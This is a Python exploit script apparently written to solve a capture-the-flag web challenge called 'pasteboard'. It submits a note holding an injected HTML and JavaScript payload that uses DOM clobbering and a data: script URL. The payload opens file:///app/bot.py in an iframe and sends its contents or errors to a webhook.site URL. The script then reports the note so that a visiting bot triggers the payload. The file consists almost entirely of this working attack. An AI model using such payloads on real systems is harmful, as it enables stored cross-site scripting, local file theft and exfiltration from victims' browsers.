import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Try loading file:// directly as the script src
# The browser might load it and we can capture errors or content
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,
var iframe = document.createElement('iframe');
iframe.src = 'file:///app/bot.py';
iframe.onload = function() {
  try {
    var content = iframe.contentWindow.document.body.innerText;
    fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/FILE?c='+encodeURIComponent(content));
  } catch(e) {
    fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ERR1?e='+e);
  }
};
iframe.onerror = function(e) {
  fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ERR2?e='+e);
};
document.body.appendChild(iframe);
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Trying iframe to load file:///app/bot.py...")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Iframe", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported!")
        print()
        print("[*] Check webhook for /FILE or /ERR requests")
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")